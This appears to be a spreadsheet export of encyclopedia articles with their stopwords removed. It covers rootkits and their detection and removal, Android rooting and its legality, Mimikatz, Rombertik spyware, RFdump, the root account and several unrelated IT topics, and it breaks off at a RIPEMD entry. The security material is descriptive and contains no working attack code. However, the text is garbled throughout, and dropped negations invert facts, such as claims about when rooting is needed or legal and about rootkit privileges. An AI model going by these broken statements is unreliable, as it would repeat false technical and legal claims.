introduced feature called "device guard", takes advantage virtualization provide independent external protection operating system rootkit-type malware. firmware hardware firmware rootkit uses device platform firmware create persistent malware image hardware, router, network card, hard drive, system bios. rootkit hides firmware, firmware usually inspected code integrity. john heasman demonstrated viability firmware rootkits acpi firmware routines expansion card rom. october 2008, criminals tampered european credit-card-reading machines installed. devices intercepted transmitted credit card details mobile phone network. march 2009, researchers alfredo ortega anibal sacco published details bios-level windows rootkit able survive disk replacement operating system re-installation. months later learned laptops sold legitimate rootkit, known absolute computrace absolute lojack laptops, preinstalled many bios images. this anti-theft technology system researchers showed turned malicious purposes.intel active management technology, part intel vpro, implements out-of-band management, giving administrators remote administration, remote management, remote control involvement host processor bios, even system powered off. remote administration includes remote power-up power-down, remote reset, redirected boot, console redirection, pre-boot access bios settings, programmable filtering inbound outbound network traffic, agent presence checking, out-of-band policy-based alerting, access system information, hardware asset information, persistent event logs, information stored dedicated memory (not hard drive) accessible even powered off. some functions require deepest level rootkit, second non-removable computer built around main computer. sandy bridge future chipsets "the ability remotely kill restore lost stolen 3g". hardware rootkits built chipset help recover stolen computers, remove data, render useless, also present privacy security concerns undetectable spying redirection management hackers might gain control. installation cloaking rootkits employ variety techniques gain control system; type rootkit influences choice attack vector. common technique leverages security vulnerabilities achieve surreptitious privilege escalation. another approach trojan horse, deceiving computer user trusting rootkit's installation program benign—in case, social engineering convinces user rootkit beneficial. installation task made easier principle least privilege applied, since rootkit explicitly request elevated (administrator-level) privileges. other classes rootkits installed someone physical access target system. some rootkits also installed intentionally owner system somebody authorized owner, e.g. purpose employee monitoring, rendering subversive techniques unnecessary. some malicious rootkit installations commercially driven, pay-per-install (ppi) compensation method typical distribution.once installed, rootkit takes active measures obscure presence within host system subversion evasion standard operating system security tools application programming interface (apis) used diagnosis, scanning, monitoring. rootkits achieve modifying behavior core parts operating system loading code processes, installation modification drivers, kernel modules. obfuscation techniques include concealing running processes system-monitoring mechanisms hiding system files configuration data. uncommon rootkit disable event logging capacity operating system, attempt hide evidence attack. rootkits can, theory, subvert operating system activities. "perfect rootkit" thought similar "perfect crime": nobody realizes taken place. rootkits also take number measures ensure survival detection "cleaning" antivirus software addition commonly installing ring (kernel-mode), complete access system. these include polymorphism (changing "signature" hard detect), stealth techniques, regeneration, disabling turning anti-malware software, installing virtual machines easier researchers discover analyze them. detection fundamental problem rootkit detection operating system subverted, particularly kernel-level rootkit, cannot trusted find unauthorized modifications components. actions requesting list running processes, list files directory, cannot trusted behave expected. words, rootkit detectors work running infected systems effective rootkits defect camouflage, lower user-mode privileges detection software kernel. computer viruses, detection elimination rootkits ongoing struggle sides conflict. detection take number different approaches, including looking virus "signatures" (e.g. antivirus software), integrity checking (e.g. digital signatures), difference-based detection (comparison expected actual results), behavioral detection (e.g. monitoring usage network traffic). kernel-mode rootkits, detection considerably complex, requiring careful scrutiny system call table look hooked functions malware subverting system behavior, well forensic scanning memory patterns indicate hidden processes. unix rootkit detection offerings include zeppoo, chkrootkit, rkhunter ossec. windows, detection tools include microsoft sysinternals rootkitrevealer, avast antivirus, sophos anti-rootkit, f-secure, radix, gmer, windowsscope. rootkit detectors prove effective ultimately contribute ineffectiveness, malware authors adapt test code escape detection well-used tools. detection examining storage suspect operating system operational miss rootkits recognised checking software, rootkit active suspicious behavior suppressed; conventional anti-malware software running rootkit operational fail rootkit hides effectively. alternative trusted medium best reliable method operating-system-level rootkit detection shut computer suspected infection, check storage booting alternative trusted medium (e.g. "rescue" cd-rom flash drive). technique effective rootkit cannot actively hide presence running. behavioral-based behavioral-based approach detecting rootkits attempts infer presence rootkit looking rootkit-like behavior. example, profiling system, differences timing frequency calls overall utilization attributed rootkit. method complex hampered high incidence false positives. defective rootkits sometimes introduce obvious changes system: alureon rootkit crashed windows systems security update exposed design flaw code. logs packet analyzer, firewall, intrusion prevention system present evidence rootkit behaviour networked environment. signature-based antivirus products rarely catch viruses public tests (depending used extent), even though security software vendors incorporate rootkit detection products. should rootkit attempt hide antivirus scan, stealth detector notice; rootkit attempts temporarily unload system, signature detection "fingerprinting") still find this combined approach forces attackers implement counterattack mechanisms, "retro" routines, attempt terminate antivirus programs. signature-based detection methods effective well-published rootkits, less specially crafted, custom-root rootkits. difference-based another method detect rootkits compares "trusted" data "tainted" content returned api. example, binaries present disk compared copies within operating memory operating systems, in-memory image identical on-disk image), results returned file system windows registry apis checked structures underlying physical disks—however, case former, valid differences introduced operating system mechanisms like memory relocation shimming. rootkit detect presence difference-based scanner virtual machine (the latter commonly used perform forensic analysis), adjust behaviour differences detected. difference-based detection used russinovich's rootkitrevealer tool find sony rootkit. integrity checking code signing uses public-key infrastructure check file modified since digitally signed publisher. alternatively, system owner administrator cryptographic hash function compute "fingerprint" installation time help detect subsequent unauthorized changes on-disk code libraries. however, unsophisticated schemes check whether code modified since installation time; subversion prior time detectable. fingerprint must re-established time changes made system: example, installing security updates service pack. hash function creates message digest, relatively short code calculated file using algorithm creates large changes message digest even smaller changes original file. recalculating comparing message digest installed files regular intervals trusted list message digests, changes system detected monitored—as long original baseline created malware added. more-sophisticated rootkits able subvert verification process presenting unmodified copy file inspection, making code modifications memory, reconfiguration registers, later compared white list expected values. code performs hash, compare, extend operations must also protected—in context, notion immutable root-of-trust holds first code measure security properties system must trusted ensure rootkit bootkit compromise system fundamental level. memory dumps forcing complete dump virtual memory capture active rootkit kernel dump case kernel-mode rootkit), allowing offline forensic analysis performed debugger resulting dump file, without rootkit able take measures cloak itself. this technique highly specialized, require access non-public source code debugging symbols. memory dumps initiated operating system cannot always used detect hypervisor-based rootkit, able intercept subvert lowest-level attempts read memory—a hardware device, implements non-maskable interrupt, required dump memory scenario. virtual machines also make easier analyze memory compromised machine underlying hypervisor, rootkits avoid infecting virtual machines reason. removal manual removal rootkit often extremely difficult typical computer user, number security-software vendors offer tools automatically detect remove rootkits, typically part antivirus suite. 2005, microsoft's monthly windows malicious software removal tool able detect remove classes rootkits. also, windows defender offline remove rootkits, runs trusted environment operating system starts. some antivirus scanners bypass file system apis, vulnerable manipulation rootkit. instead, access file system structures directly, information validate results system apis identify differences caused rootkit. there experts believe reliable remove re-install operating system trusted media. this antivirus malware removal tools running untrusted system ineffective well-written kernel-mode rootkits. booting alternative operating system trusted media allow infected system volume mounted potentially safely cleaned critical data copied off—or, alternatively, forensic examination performed. lightweight operating systems windows windows recovery console, windows recovery environment, bartpe, live distros used purpose, allowing system "cleaned". even type nature rootkit known, manual repair impractical, re-installing operating system applications safer, simpler quicker. defenses system hardening represents first layers defence rootkit, prevent able install. applying security patches, implementing principle least privilege, reducing attack surface installing antivirus software standard security best practices effective classes malware. secure boot specifications like unified extensible firmware interface designed address threat bootkits, even vulnerable security features offer utilized. server systems, remote server attestation using technologies intel trusted execution technology (txt) provide verifying servers remain known good state. example, microsoft bitlocker's encryption data-at-rest verifies servers known "good state" bootup. privatecore vcage software offering secures data-in-use (memory) avoid bootkits rootkits verifying servers known "good" state bootup. privatecore implementation works concert intel locks server system interfaces avoid potential bootkits rootkits. also computer security conference host-based intrusion detection system man-in-the-middle attack rootkit arsenal: escape evasion dark corners system notes references further reading blunden, bill (2009). rootkit arsenal: escape evasion dark corners system. wordware. isbn 978-1-59822-061-2. hoglund, greg; butler, james (2005). rootkits: subverting windows kernel. addison-wesley professional. isbn 978-0-321-29431-9. grampp, morris, robert (october 1984). "the unix system: unix operating system security". at&amp;t bell laboratories technical journal. (8): 1649–1672. doi:10.1002/j.1538-7305.1984.tb00058.x. s2cid 26877484. kong, joseph (2007). designing rootkits. starch press. isbn 978-1-59327-142-8. veiler, (2007). professional rootkits. wrox. isbn 978-0-470-10154-4. external links media related rootkits wikimedia commons</t>
  </si>
  <si>
    <t>Rooting (Android)</t>
  </si>
  <si>
    <t>rooting process allowing users android mobile operating system attain privileged control (known root access) various android subsystems. android based modified version linux kernel, rooting android device gives similar access administrative (superuser) permissions linux unix-like operating system freebsd macos. rooting often performed goal overcoming limitations carriers hardware manufacturers devices. thus, rooting gives ability permission) alter replace system applications settings, specialized applications ("apps") require administrator-level permissions perform operations otherwise inaccessible normal android user. devices, rooting also facilitate complete removal replacement device's operating system, usually recent release current operating system. root access sometimes compared jailbreaking devices running apple operating system. however, different concepts: jailbreaking bypass several types apple prohibitions user, including modifying operating system (enforced "locked bootloader"), installing non-officially approved (not available store) applications sideloading, granting user elevated administration-level privileges (rooting). many vendors htc, sony, oneplus, asus, xiaomi google explicitly provide ability unlock devices, even replace operating system entirely. similarly, ability sideload applications typically permissible android devices without root permissions. thus, primarily third aspect jailbreaking (giving users administrative privileges) directly correlates android rooting. rooting distinct unlocking bootloader unlocking. former allows removing card lock phone, latter allows rewriting phone's boot partition (for example, install replace operating system). overview rooting lets user-installed applications privileged commands typically unavailable devices stock configuration. rooting required advanced potentially dangerous operations including modifying deleting system files, removing pre-installed applications, low-level access hardware (rebooting, controlling status lights, recalibrating touch inputs.) typical rooting installation also installs superuser application, supervises applications granted root superuser rights requesting approval user granting said permissions. secondary operation, unlocking device's bootloader verification, required remove replace installed operating system. contrast jailbreaking, rooting needed applications distributed outside google play store, sometimes called sideloading. android supports feature natively ways: "unknown sources" option settings menu android debug bridge. however, carriers, including at&amp;t, prevented installation applications play store firmware, although several devices subject rule, including samsung infuse at&amp;t lifted restriction devices middle 2011.as 2011, amazon kindle fire defaults amazon appstore instead google play, though like android devices, kindle fire allows sideloading applications unknown sources, "easy installer" application amazon appstore makes easy. other vendors android devices look sources future. access alternate apps require rooting rooting always necessary. rooting android phone lets owner add, edit delete system files, turn lets perform various tweaks apps require root access. advantages advantages rooting include possibility complete control appearance, feel, behaviour device. superuser access device's system files, aspects operating system customized real limitation level coding expertise. immediately expectable advantages rooted devices include following: support theming, allowing everything visually changed color type battery status indicator boot animation appears device booting, status bar, control menu, virtual on-screen navigation buttons, more. full control kernel, which, example, allows overclocking underclocking gpu. full application control, including ability fully back restore, batch-edit applications, remove bloatware comes pre-installed phones. custom automated system-level processes third-party applications. ability install software (such xposed, magisk, supersu, busybox, etc.) allows additional levels control rooted device management root access. access unix shell commands, standalone android debug bridge. ability bypass restrictions vendors google, scoped storage, compromised file system access compatibility established third-party mobile applications file managers. extended task management abilitiesability terminate misbehaving and/or unresponsive system tasks media scanner camera server manually. ability downgrade applications directly, without uninstallation involves deleting user data. downgrade desirable update breached compatibility and/or removed useful functionality. ability control battery charging current, technically unnecessary throttling imposed operating system screen removed. hand, current reduction desired extend battery lifespan. apis vary vendor. example, samsung galaxy devices, done applying value /sys/devices/platform/sec-battery/power_supply/battery/siop_level system file, represents highest technically supported charging rate. ability limit charging capacity reduce battery weardown. related concepts rooting allows user obtain privileged access phone. allow user install (custom firmware custom rom) recovery image, allow phone locked certain carrier used another one. related operations allow these. bootloader unlock bootloader unlocking sometimes first step used root device; however, rooting device. most devices come locked bootloader, prevents users installing bootloader. bootloader runs device start-up charge loading operating system phone. generally charge verifying phone system information tampered genuine. nonetheless, people still perform operation, unlocking bootloader allows users install custom roms.the first step generally unlocking, follow manufacturer specific instructions. devices bootloader unlocked. process unlocking bootloader might involve factory reset, erasing user data, third-party applications, configuration. unlock unlocking allows phone locked certain carrier used different carrier. instructions vary device carrier, might done first requesting carrier unlock phone purchasing unlock code online. methods some rooting methods involve command prompt development interface called android debug bridge (also known adb), methods existing vulnerabilities devices. similarly modeled devices often multitude changes, rooting methods device used different variant result bricking device. "systemless root" variant rooting underlying device filesystem modified. systemless root uses various techniques gain root access without modifying system partition device. some root applications include "hiding" function, makes attempts mask effects results rooting, often whitelisting certain applications root blocking access affected files. systemless rooting advantage triggering software-based version safetynet, android feature works monitoring changes system files used applications google detect whether device tampered rooting. however, hardware-backed safetynet versions triggered systemless rooting, well unrooted devices shipped without google mobile services (gms).the distinction "soft rooting" security vulnerability "hard-rooting" flashing binary executable varies exploit exploit, manufacturer manufacturer. soft-rooting requires device vulnerable privilege escalation, replacing executable binaries. hard-rooting supported manufacturer, generally exposed devices manufacturer allows. phone soft-rooted, also inherently vulnerable malware. rooting exploits process rooting varies widely device usually includes exploiting security bugs firmware (i.e., version android installed device. once exploit discovered, custom recovery image skip digital signature check firmware updates flashed. then modified firmware update typically includes utilities needed apps root installed. example, binary (such open-source paired superuser supersu application) copied location current process' path (e.g., /system/xbin/) granted executable permissions chmod command. third-party supervisor application, like superuser supersu, regulate elevated permission requests applications. many guides, tutorials, automatic processes exist popular android devices facilitating fast easy rooting process. process rooting device simple complex, even depend upon serendipity. example, shortly release dream (htc g1), discovered anything typed using keyboard interpreted command privileged (root) shell. although google quickly released patch this, signed image firmware leaked, gave users ability downgrade original exploit gain root access. installable apps managed unlock immediate root access early 2010s samsung smartphones. this also referred "one-click rooting". rooting manufacturer some manufacturers, including xiaomi, oneplus, motorola, provide official support unlocking bootloader, allowing rooting without exploiting vulnerability. however, support limited certain phones example, released bootloader unlock tool certain models phones. also, manufacturer could discontinue bootloader unlocking support, case huawei.the google nexus pixel line devices bootloader unlocked simply connecting device computer bootloader mode running fastboot protocol command fastboot unlock. after warning accepted, bootloader unlocked, system image written directly flash without need exploit. additionally, pixel phones sold certain carriers like verizon support bootloader unlocking, others t-mobile require phone paid bootloader unlocked. difficulties past, many manufacturers tried make non-rootable phones elaborate protections (like droid exploits usually still found eventually. there root exploit available new, outdated phones. industry reaction until 2010, tablet smartphone manufacturers, well mobile carriers, mainly unsupportive third-party firmware development. manufacturers expressed concern improper functioning devices running unofficial software related support costs. moreover, firmware omnirom cyanogenmod sometimes offer features carriers would otherwise charge premium, tethering. that, technical obstacles locked bootloaders restricted access root permissions commonly introduced many devices. example, late december 2011, barnes noble amazon.com, inc. began pushing automatic, over-the-air firmware updates, 1.4.1 nook tablets 6.2.1 kindle fires, removed method gain root access devices. nook tablet 1.4.1 update also removed users' ability sideload apps sources official barnes noble store (without modding).however, community-developed software began grow popular late 2009 early 2010, following statement copyright office librarian congress (us) allowing "jailbroken" mobile devices, manufacturers carriers softened position regarding cyanogenmod unofficial firmware distributions. some manufacturers, including htc, samsung, motorola sony mobile communications, actively provide support encourage development. 2011, need circumvent hardware restrictions install unofficial firmware lessened increasing number devices shipped unlocked unlockable bootloaders, similar nexus series phones. device manufacturer announced support aftermarket software developers making bootloaders devices unlockable. however, carriers, verizon wireless recently at&amp;t, continuously blocked oems releasing retail devices unlocked bootloaders, opting instead "developer edition" devices sold unsubsidized off-contract. these similar practice nexus devices, premium contract discounts. 2014, samsung released security service called knox, tool prevents modifying system boot files, attempts e-fuse 0x1, permanently voiding warranty. legality international treaties influenced development laws affecting rooting. 1996 world intellectual property organization (wipo) copyright treaty requires nations party treaties enact laws digital rights management (drm) circumvention. american implementation digital millennium copyright (dmca), includes process establishing exemptions non-copyright-infringing purposes rooting. 2001 european copyright directive implemented treaty europe, requiring member states european union implement legal protections technological protection measures. copyright directive includes exceptions allow breaking measures non-copyright-infringing purposes, alternative software, member states vary implementation directive. australia 2010, electronic frontiers australia said unclear whether rooting legal australia, anti-circumvention laws apply. these laws strengthened copyright amendment 2006. canada november 2012, canada amended copyright provisions prohibiting tampering digital locks, exceptions including software interoperability. rooting device alternative software form circumventing digital locks purpose software interoperability. there several efforts 2008 2011 amend copyright (bill c-60, bill c-61, bill c-32) prohibit tampering digital locks, along initial proposals c-11 restrictive, bills aside. 2011, michael geist, canadian copyright scholar, cited iphone jailbreaking non-copyright-related activity overly broad copyright amendments could prohibit. european union free software foundation europe argues legal root flash device. according european directive 1999/44/ec, replacing original operating system another void statutory warranty covers hardware device years unless seller prove modification caused defect. united kingdom copyright related rights regulations 2003 makes circumventing protection measures legal purpose interoperability copyright infringement. rooting form circumvention covered law, tested court. competition laws also relevant. india india's copyright permits circumventing non-copyright-infringing purposes. indian parliament introduced bill including provision 2010 passed 2012 copyright (amendment) bill 2012. india signatory wipo copyright treaty requires laws circumvention, listed special report "priority watch list" applied pressure develop stricter copyright laws line wipo treaty. zealand zealand's copyright allows circumvention technological protection measure (tpm) long legal, non-copyright-infringing purposes. this added copyright 1994 part copyright (new technologies) amendment 2008. singapore rooting might legal singapore done provide interoperability circumvent copyright, tested court. united states unlocking consumer choice wireless competition guarantees consumers unlock others unlock phones. under digital millennium copyright (dmca) rooting illegal united states except exemption. u.s. copyright office granted exemption least 2015".in 2010, response request electronic frontier foundation, u.s. copyright office explicitly recognized exemption dmca permit rooting. ruling, library congress affirmed july 2010, rooting exempt dmca rules respect circumventing digital locks. dmca exemptions must reviewed renewed every three years else expire. october 2012, copyright office updated exemption policies. rooting smartphones continues legal "where circumvention accomplished sole purpose enabling interoperability [lawfully obtained software] applications computer programs telephone handset". however, u.s. copyright office refused extend exemption tablets, arguing term "tablets" broad ill-defined, exemption class devices could unintended side effects. copyright office also renewed 2010 exemption unofficially unlocking phones unapproved carriers, restricted exemption phones purchased january 2013.tim professor columbia school, argued 2007 jailbreaking "legal, ethical, plain fun". cited explicit exemption issued library congress 2006 personal unlocking, notes locks "are used wireless carriers limit ability subscribers switch carriers, business decision nothing whatsoever interests protected copyright" thus implicate dmca. claim exemption applies help others unlock device "traffic" software 2010 2012, u.s. copyright office approved exemptions dmca allow users root devices legally. still possible employ technical countermeasures prevent rooting prevent rooted phones functioning. also unclear whether legal traffic tools used make rooting easy. also android phone hacking consumer electronics list custom android firmware notes references</t>
  </si>
  <si>
    <t>Mimikatz</t>
  </si>
  <si>
    <t>mimikatz exploit microsoft windows extracts passwords stored memory software performs exploit. created french programmer benjamin delpy french slang "cute cats". history benjamin delpy discovered flaw microsoft windows holds encrypted copy password used decipher memory time. contacted microsoft 2011 point flaw, microsoft replied would require machine already compromised. delpy realised flaw could used gain access non-compromised machines network compromised machine.he released first version software 2011 closed source software.in september 2011, exploit used diginotar hack. russian conference spoke software conference 2012. once conference, returned room find stranger sitting laptop. stranger apologised, saying wrong room left. second approached conference demanded give copies presentation software flash drive. delpy gave copies.delpy felt shaken experiences left russia, released source code github. felt defending cyberattacks learn code order defend attack. windows updates 2013 microsoft added feature windows would allow turning feature could exploited. windows feature turned default, jake williams rendition infosec says remains effective, either system runs outdated version windows, privilege escalation gain enough control target turn exploitable feature.benjamin delpy updated software cover exploits original. malware carbanak attack cyberattack bundestag used exploit. notpetya badrabbit malware used versions attack combined eternalblue externalromance exploits. popular culture robot episode season angela moss uses mimikatz bosses windows domain password. references external links implementation benjamin delpy github implementation exploit github</t>
  </si>
  <si>
    <t>Oracle Enterprise Manager Ops Center</t>
  </si>
  <si>
    <t>oracle enterprise manager center (formerly center) data center automation tool simplifies discovery management physical virtualized assets. among features can: provide single console management physical virtual infrastructure virtualized environment allow discovery existing infrastructure, including hardware unpacked plugged switched power everything provision hardware firmware, operating system hypervisors applications required once operational, ensure software servers, physical virtualized, automatically updated patched enable custom reports generated operational well compliance purposes.ops center includes browser-based, platform-independent interface uses ajax. also virtualbox references external links oracle enterprise manager center home page oracle enterprise manager center documentation center developer forum center doctor self diagnosis utility center halcyon neuron integration center</t>
  </si>
  <si>
    <t>RF monitor software</t>
  </si>
  <si>
    <t>monitor software software (with special hardware wifi-card) able detect signal strength error rate wireless networks. software includes network discovery software programs kismet network stumbler, latter provide much information network itself, precise true monitor software. extra precision especially useful cooperation directional antenna (e.g. cantennas). references</t>
  </si>
  <si>
    <t>Optimistic replication</t>
  </si>
  <si>
    <t>optimistic replication, also known lazy replication, strategy replication, replicas allowed diverge.traditional pessimistic replication systems guarantee beginning replicas identical other, single copy data along. optimistic replication away favor eventual consistency, meaning replicas guaranteed converge system quiesced period time. result, longer need wait copies synchronized updating data, helps concurrency parallelism. trade-off different replicas require explicit reconciliation later might prove difficult even insoluble. algorithms optimistic replication algorithm consists five elements: operation submission: users submit operations independent sites. propagation: each site shares operations knows rest system. scheduling: each site decides order operations knows about. conflict resolution: conflicts among operations site scheduled, must modify way. commitment: sites agree final schedule conflict resolution result, operations made permanent.there strategies propagation: state transfer, sites propagate representation current state, operation transfer, sites propagate operations performed (essentially, list instructions reach state). scheduling conflict resolution either syntactic semantic. syntactic systems rely general information, operation submitted. semantic systems able make application-specific information make smarter decisions. note state transfer systems generally information semantics data transferred, syntactic scheduling conflict resolution. examples well-known example system based optimistic replication version control system, version control system uses copy-modify-merge paradigm. covers five elements: operation submission: users edit local versions files. propagation: users manually pull updates central server, push changes user feels ready. scheduling: operations scheduled order received central server. conflict resolution: when user pushes pulls central repository, conflicts flagged user manually. commitment: once central server accepts changes user pushes, permanently committed.a special case replication synchronization, replicas. example, personal digital assistants (pdas) allow users edit data either computer, merge datasets together. note, however, replication broader problem synchronization, since replicas. other examples include: usenet, systems thomas write rule (see rfc677) multi-master database replication coda distributed filesystem operational transformation, theoretical framework group editing peer-to-peer wikis conflict-free replicated data types bayou distributed database icecube implications applications built optimistic replicated databases need careful ensuring delayed updates observed impair correctness application. simple example, application contains viewing part database state, editing users edit state changing viewer. alarmed edit "didn't work", again, potentially once. updates idempotent (e.g., increment value), lead disaster. even idempotent, spurious database updates lead performance bottlenecks, especially database systems processing heavy loads; become vicious circle. testing applications often done testing environment, smaller size (perhaps single server) less loaded "live" environment. replication behaviour installation differ live environment ways mean replication unlikely observed testing, masking replication-sensitive bugs. application developers must careful assumptions make effect database update, must sure simulate testing environments. optimistically replicated databases careful offering features validity constraints data. given update accepted based current state record, updates individually legal starting state system, updates legal state system update (e.g., legal, illegal). initiated roughly time within database, successfully applied nodes others, soon "meet" attempted node already applied other, conflict found. system must, case, decide update finally "wins", arrange nodes already applied losing update revert however, nodes temporarily expose state reverted update, inform user initiated update failure, without requiring wait (potentially forever) confirmation acceptance every node. references external links saito, yasushi; shapiro, marc (september 2003). "optimistic replication" (pdf). microsoft. {{cite journal}}: cite journal requires |journal= (help)</t>
  </si>
  <si>
    <t>Operational availability</t>
  </si>
  <si>
    <t>operational availability systems engineering measurement long system available compared long available used. definition operational availability management concept evaluates following. diagnostic time criticality fault isolation time logistics delay time corrective maintenance timeany failed item corrected induce operational failure. {\displaystyle a_{o}} used evaluate risk. operational failure unacceptable situation following occur. capital equipment loss injury loss life sustained failure accomplish missionin military acquisition, operational availability used performance parameters requirements documents, form basis decision support analyses. history aircraft systems, ship systems, missile systems, space systems large number failure modes must addressed limited resources. formal reliability modeling development required prioritize resource allocation operation begins. estimated failure rates logistics delay used identify number forward positioned spare parts required avoid excessive time. this also used justify expense associated redundancy. formal availability measurement used operation prioritize management decisions involving upgrade resource allocation, manpower allocation, spare parts planning. principle operational availability used evaluate following performance characteristic. system expected available constantly, operational availability figures translate system unavailable approximately following lengths time (when outages year added together): {\displaystyle a_{o}=0.9\approx 877\ hours\ down\ time\ per\ year} 0.99 {\displaystyle a_{o}=0.99\approx hours\ down\ time\ per\ year} 0.999 {\displaystyle a_{o}=0.999\approx hours\ down\ time\ per\ year} 0.9999 {\displaystyle a_{o}=0.9999\approx minutes\ down\ time\ per\ year} 0.99999 {\displaystyle a_{o}=0.99999\approx minutes\ down\ time\ per\ year} following data collected maintenance actions operation prioritize corrective funding. diagnostic time required identify amount time spent perform maintenance fault reporting support condition-based maintenance. criticality identifies level risk associated loss mission, injury loss life, capitol equipment. fault isolation time required identify amount time spent locating failure. logistics delay time required identify amount time required obtain replacement parts software. corrective maintenance time required identify amount time required install reconfigure replacement parts software.this data applied reliability block diagram evaluate individual availability reduction contributions using following formulas. {\displaystyle a_{o}^{d}=\left({\frac {total\ time}{total\ time+diagnostic\ down\ time}}\right)} {\displaystyle a_{o}^{fi}=\left({\frac {total\ time}{total\ time+fault\ isolation\ down\ time}}\right)} {\displaystyle a_{o}^{l}=\left({\frac {total\ time}{total\ time+logistics\ down\ time}}\right)} {\displaystyle a_{o}^{c}=\left({\frac {total\ time}{total\ time+corrective\ down\ time}}\right)} redundant items contribute availability reduction unless redundant components fail simultaneously. operational availability overall availability considering contributions. {\displaystyle a_{o}=a_{o}^{d}\times a_{o}^{fi}\times a_{o}^{l}\times a_{o}^{c}} also active redundancy availability downtime reliability block diagram references</t>
  </si>
  <si>
    <t>Root (Linux)</t>
  </si>
  <si>
    <t>computing, superuser special user account used system administration. depending operating system (os), actual name account might root, administrator, admin supervisor. cases, actual name account determining factor; unix-like systems, example, user user identifier (uid) zero superuser, regardless name account; systems implement role based security model, user role superuser synonyms) carry actions superuser account. principle least privilege recommends users applications ordinary account perform work, superuser account capable making unrestricted, potentially adverse, system-wide changes. unix unix-like unix-like computer oses (such linux), root conventional name user rights permissions files programs) modes (single- multi-user). alternative names include baron beos avatar unix variants. often provides toor ("root" written backward) account addition root account. regardless name, superuser always user root user many things ordinary user cannot, changing ownership files binding network ports numbered 1024. name root originated root user account permission modify root directory unix system. this directory originally considered root's home directory, unix filesystem hierarchy standard recommends root's home /root. first process bootstrapped unix-like system, usually called init, runs root privileges. spawns processes directly indirectly, inherit parents' privileges. only process running root allowed change user another user; done back. doing sometimes called dropping root privileges often done security measure limit damage possible contamination process. another case login programs users credentials case successful authentication allow programs privileges accounts. often recommended root never used normal user account, since simple typographical errors entering commands cause major damage system. instead, normal user account used, either (substitute user) sudo (substitute user command used. approach requires user know root password, sudo method requires user power root" within /etc/sudoers file, typically indirectly made member wheel, adm, admin, sudo group. number reasons, sudo approach generally preferred example leaves audit trail used command administrative operations performed.some oses, macos linux distributions (most notably ubuntu), automatically give initial user created ability root sudo configure password administrative actions. cases actual root account disabled default, can't directly used. mobile platform-oriented apple android, superuser access inaccessible design, generally security system exploited order obtain systems, plan superuser all. microsoft windows windows later systems derived (such windows 2000, windows windows server 2003, windows vista/7/8/10/11), must least administrator account (windows earlier) able elevate privileges superuser (windows vista/7/8/10/11 user account control). windows earlier systems, built-in administrator account remains hidden user administrator-equivalent account exists. this built-in administrator account created blank password. this poses security risks local users would able access computer built-in administrator account password left blank, account disabled default windows vista later systems introduction user account control (uac). remote users unable access built-in administrator account. windows administrator account exact analogue unix root account administrator, built-in administrator account, user administrator account level privileges. default user account created windows systems administrator account. unlike macos, linux, windows vista/7/8/10 administrator accounts, administrator accounts windows systems without insulate system pitfalls full root access. pitfalls includes decreased resilience malware infections. avoid maintain optimal system security pre-uac windows systems, recommended simply authenticate necessary standard user account, either password built-in administrator account, another administrator account. windows vista/7/8/10/11 administrator accounts, prompt appear authenticate running process elevated privileges. usually, user credentials required authenticate prompt administrator accounts authenticating prompt requires entering username password administrator standard user accounts. windows (and earlier systems) administrator accounts, authentication required process elevated privileges poses another security risk development uac. users process elevated privileges standard accounts setting process "run administrator" using runas command authenticating prompt credentials (username password) administrator account. much benefit authenticating standard account negated administrator account's credentials used blank password built-in administrator account windows earlier systems), hence recommended password built-in administrator account. windows 2000 higher, root user administrator account. novell netware novell netware, superuser called "supervisor", later "admin". openvms openvms, "system" superuser account older personal systems many older oses computers intended personal home use, anyone using system full privileges. many systems, dos, concept multiple accounts, although others windows allow multiple accounts, could preferences profile users still full administrative control machine. also jailbreaking (ios) nobody (username) passwd power user privilege escalation rooting (android rootkit sudo references external links root definition linux information project (linfo) introduction security</t>
  </si>
  <si>
    <t>Mini Xplus</t>
  </si>
  <si>
    <t>mini xplus small computer runs android based allwinner soc. sold together remote control therefore suitable htpc. references external links official website</t>
  </si>
  <si>
    <t>Rombertik</t>
  </si>
  <si>
    <t>rombertik spyware designed steal confidential information targets using internet explorer, firefox, chrome running windows computers. first publicized researchers cisco talos security intelligence group. operation rombertik employs several techniques make analyzing reverse-engineering difficult. over file unnecessary code data meant overwhelm analysts. loops code hundreds millions times delay execution, checks file names user names used malware analysis sandboxes. rombertik detects modification compile time binary resource memory, attempts overwrite master boot record (mbr) primary hard drive. contains code necessary boot operating system, well information partitions stored hard drive. though user's data remains hard drive, operating system unable access without mbr. cases, possible recover data hard drive modified mbr.if malware necessary permissions overwrite mbr, instead encrypts file victim's home directory. this directory encryption technique similar ransomware, rombertik attempt extort money victims. files encrypted strong nearly impossible recover.ps installed, injects code running processes internet explorer, firefox, chrome. injected code intercepts data encrypted browser, forwards remote server. references</t>
  </si>
  <si>
    <t>RFdump</t>
  </si>
  <si>
    <t>rfdump software created lukas grunwald christian bottger purpose security auditing rfid tags. periodically updated emerging rfid standards e-passport mifare encryption currently found many systems. rfdump back-end tool directly inter-operate rfid reader make contents stored rfid tags accessible. tools reads rfid tag's meta information: type, manufacturer etc. user data displayed modified using either ascii editor. addition, integrated cookie feature demonstrates simple company abuse rfid technology, used unwitting consumers. rfdump works multi-tag reader similar card reader hardware. rfdump features (gtk application): runs linux, windows supports acgs pcmcia/cf multi-tag readers decodes type, manufacturer displays memory ascii encoding allows write memory using ascii editor full iso/iec 14443 type support support mifare sector keys cookie feature using arbitrary cookie automatically incrementing counter brute-force cracking access control cards (sector keys) audit encrypted rfid tags check default shipping keys save restore mifare cards including sector keys multi baudrate reader support; rfdump baud rate scan option configuration menussupported types: iso/iec 15693: tag-it iso, my-d, i-code sli, lri512, tempsense iso/iec 14443 type mifare standard(1,2), mifare ultralight(1,2) iso/iec 14443 type sr176(1,2) tag-it i-code em4002 em4005 em4050 hitag1 hitag2 tiris references mudsplatter, official site rfdump. 2009 david reid, epassports risk' cloning. online, 2006</t>
  </si>
  <si>
    <t>RIPEMD</t>
  </si>
  <si>
